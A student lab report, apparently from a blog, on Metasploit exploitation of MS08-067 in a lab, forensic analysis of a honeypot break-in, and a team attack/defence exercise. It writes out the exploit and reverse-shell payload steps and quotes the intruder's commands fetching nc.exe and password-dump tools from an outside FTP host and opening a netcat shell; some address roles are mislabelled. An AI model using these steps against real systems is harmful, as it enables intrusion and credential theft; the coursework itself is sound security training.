一、实践内容
1、动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
2、取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击?
攻击者如何使用这个破解工具进入并控制了系统?
攻击者获得系统访问权限后做了什么?
我们如何防止这样的攻击?
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
3、团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息
二、实验过程
1、动手实践Metasploit windows attacker
首先输入命令行msfconsole进入启动msfconsole。
再输入命令行search ms08_067查看漏洞ms08_067详细信息
输入use windows/smb/ms08_067_netapi进入漏洞所在文件
输入命令行show options查看攻击此漏洞需要的设置
输入命令行show payloads显示这个漏洞有哪些荷载
选择第五个进行攻击,输入命令行set payload generic/shell_reverse_tcp设置载荷,输入命令行set RHOST 192.168.200.124设置攻击主机,输入命令行set LHOST 192.168.200.2设置靶机
输入命令行ipconfig/all查看靶机的IP,攻击成功
打开wireshark查看抓包情况
从wireshark抓包中可见:
源地址为192.168.200.4,源端口为4444,目的地址为192.168.200.124,目的端口为1447,攻击发起时间从ARP协议的询问开始
2、取证分析实践:解码一次成功的NT系统破解攻击
在学习通上把下载的snort-0204@0117.log文件拖入虚拟机kali中,再用wireshark打开。
打开一个数据包的tcp数据流,找到特殊字符%C0%AF,查询百度可知,Unicode字符解码中,存在Unicode解析错误漏洞
分析TCP数据流,发现有请求msadcs.dll的数据包,有数据库查询语句和shell语句,通过"ADM!ROX!YOUR!WORLD!–"分析存在RDS漏洞,发现msadc(2).pl 渗透攻击代码所发起的,攻击者从此获取并成功进入了shell。
查看文件
获取密码、用户组、管理员账号等
试图获得管理员权限
攻击者如何使用这个破解工具进入并控制了系统
在Wireshark中输入ftp进行筛选,发现106行的ftp连接成功,右键追踪TCP流,可以看出:攻击者通过创建了ftpcom脚本,使用ftp连接 nether.net,并以johna2k为用户、haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll:
在第1233个的数据中,发现攻击者有一条c+nc±l±p+6969± e+cmd1.exe的命令,攻击者连接上了6969端口并获得了访问权限:
我们如何防止这样的攻击:
(1)定期更新和维护软件:确保你的数据库系统和相关软件都是最新版本,并及时应用厂商发布的安全补丁和更新。
(2)强密码策略:确保数据库和应用程序使用的所有账户都有强密码,并定期更改这些密码。
(3)最小权限原则:为数据库和应用程序设置最小权限,即每个用户只能访问他们需要的最小数据和功能。
(4)输入验证和过滤:在应用程序中实施严格的输入验证和过滤,以防止恶意用户通过输入恶意代码来利用 Unicode 漏洞或其他漏洞。
(5)数据加密:对敏感数据进行加密存储,以及在传输过程中进行加密,以防止数据泄露。
(6)网络安全措施:在数据库服务器和应用服务器之间实施网络安全措施,如防火墙、入侵检测系统(IDS)和入侵防御系统(IPS),以及网络隔离和安全通信协议等。
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
通过查看数据流可以发现,攻击者已经警觉到目标是一个蜜罐主机,在数据中可以看到攻击者已经写出。
3、团队对抗实践:windows系统远程渗透攻击和分析
3.1攻击阶段
首先将虚拟机kali网络适配器设置为桥接模式,使其和本机的网段一致
(20232803吴锦龙)kali攻击机:192.168.151.10
(20232807张哲)win2k靶机:192.168.151.53
输入msfconsole,进入Metasploit工具
输入exploit/windows/smb/ms08_067_netapi进入攻击脚本文件
输入show payloads查看可以使用的荷载
输入set payload generic/shell_reverse_tcp,对这个荷载进行攻击
输入set RHOST 192.168.151.53来设置靶机,输入set LHOST 192.168.151.10来设置攻击机
输入exploit发现攻击机攻击靶机成功
再次在攻击机(192.168.151.10)上输入ipconfig,发现显示靶机的ip地址,证明已进入靶机系统
输入mkdir WuJinLong20232803新建一个文件夹,在靶机win2k上打开system32发现已创建该文件
打开Wireshark,能找到刚刚攻击机攻击时使用的命令
3.2防御阶段
都将虚拟机改为桥接模式,并自动获取ip地址
kali攻击机(20232807张哲):192.168.151.98
win2k靶机(20232803吴锦龙):192.168.151.65
在攻击机攻击之后发现在靶机上新建了一个文件夹ZhangZhe20232807
在wireshark上抓包TCP流能发现攻击机执行的操作命令
三、实验中遇到的问题及解决
问题:在将Win2K设置为桥接模式后,使用iconfig命令发现其ip地址并没有发生变化
解决方式:右键网上邻居打开属性,进入网络与拨号连接,打开本地连接的属性找到Internet协议(TCP/IP),将IP地址和DNS服务器地址都改为自动获得。
四、学习感悟
在这次的实验中我学习到了使用metasploit软件进行windows远程渗透统计实验,还解析了一次攻击实验。在实验过程中遇到了一些问题,也表明自己还需不断努力,不断提高实践能力。
620
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
